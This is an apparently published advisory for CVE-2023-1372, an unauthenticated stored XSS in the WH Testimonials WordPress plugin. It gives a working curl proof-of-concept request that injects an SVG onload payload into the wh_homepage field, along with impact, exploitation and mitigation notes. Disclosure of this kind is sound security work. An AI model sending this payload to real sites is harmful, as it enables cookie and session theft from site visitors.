CVE-2023-1372 - WH Testimonials <= 3.0.0 - Unauthenticated Stored Cross-Site Scripting
A stored XSS vulnerability has been identified in the WH Testimonials WordPress plugin. The vulnerable parameter is "wh_homepage", which is submitted via an HTTP POST request to the add testimonial functionality of the plugin.
Table of Contents
WH Testimonials Plugin v3.0.0 is a popular WordPress plugin used to manage and display testimonials on websites. It provides several features to customize the layout of testimonials. However, a cross-site scripting (XSS) vulnerability has been discovered in the plugin, which can allow an attacker to inject malicious code and execute it in the context of the victim's browser.
The vulnerability is caused by the insufficient validation of user-supplied input in the "wh_homepage" POST parameter. An attacker can inject malicious code into this parameter, which will be reflected back to the victim when they visit the vulnerable page.
Here's The Proof Of Concept
curl -X POST 'http://example.com/add/' \ -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLKXxMfAqKI63OgZ4' \ -H 'Host: example.com' \ -H 'Content-Length: XXX' \ -d $'------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_clientname"\r\n\r\nFirst Name\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_company"\r\n\r\nLast Name\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_homepage"\r\n\r\n\"><svg/onload=prompt(/XSS/)>\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_text_short"\r\n\r\nShort Review\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_text_full"\r\n\r\nLong Review\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_sfimgurl"; filename=""\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormsoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="Wh_addnew"\r\n\r\nAdd Testimonial\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4--\r\n'
An attacker can exploit this vulnerability to steal sensitive information, such as cookies, session tokens, and other sensitive data. They can also perform unauthorized actions on behalf of the victim, such as modifying the victim's account settings, posting spam, or installing malware.
To exploit the vulnerability, an attacker can craft a malicious request with the payload mentioned above and send it to the vulnerable server. When the server processes the request, it reflects the payload back to the victim's browser, which executes the injected code. For example, the attacker can send a phishing email to the victim with a link to the vulnerable page. When the victim clicks on the link, the injected code executes, and the attacker can steal sensitive information.
To mitigate the vulnerability, the plugin developer should validate and sanitize user-supplied input before processing it. They should also implement output encoding to prevent malicious code injection. Additionally, users should keep their plugins and WordPress installation up to date to prevent vulnerabilities from being exploited.
Daniel Kelley Newsletter
Join the newsletter to receive the latest updates in your inbox.